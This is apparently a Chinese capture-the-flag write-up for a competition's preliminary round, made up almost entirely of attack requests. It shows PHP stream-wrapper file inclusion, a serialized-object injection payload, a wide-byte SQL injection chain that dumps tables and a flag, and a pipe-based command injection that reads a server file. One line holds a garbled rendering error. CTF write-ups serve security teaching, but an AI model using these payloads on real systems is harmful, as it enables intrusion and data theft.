某工匠杯预选赛题解

you are not admin !<!--$user = $_GET["user"];$file = $_GET["file"];$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){    echo "hello admin!<br>";    include($file); //class.php}else{    echo "you are not admin ! ";}-->

if(isset(KaTeX parse error: Expected 'EOF', got '&' at position 6: user)&̲&(file_get_cont…user,'r')===“the user is admin”))

POST /?user=php://input&flie=class.php HTTP/1.1Host: 192.168.1.1:56782Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 17
the user is admin

POST /?user=php://input&file=php://filter/convert.base64-encode/resource=class.php HTTP/1.1Host: 192.168.1.1:56782Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 17
the user is admin

PD9waHAKCmNsYXNzIFJlYWR7Ly9mMWFnLnBocAogICAgcHVibGljICRmaWxlOwogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsKICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpewogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICJfX3RvU3RyaW5nIHdhcyBjYWxsZWQhIjsKICAgIH0KfQo/Pgo=

<?phpclass Read{//flag.php    public $file;    public function __toString(){        if(isset($this->file)){            echo file_get_contents($this->file);        }        return "__toString was called!";    }}?>

POST /?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1ag.php";} HTTP/1.1Host: 192.168.1.1:56782Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 17
the user is admin

http://40.x.x.x:3036/sql1.php?id=%df'

# 构造：id=1%df%27union select...%23

sql1.php?id=%df%27 union select 1,database()%23

sql1.php?id=%df%27union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

sql1.php?id=%df%27union select 1,group_concat(column_name)from information_schema.columns where table_name=%23

sql1.php?id=%df%27union select 1,hex(group_concat(thisisflag)) from flag%23

payload: ip=127.0.0.1|cat$IFS/var/www/html/flag.php&submit=PING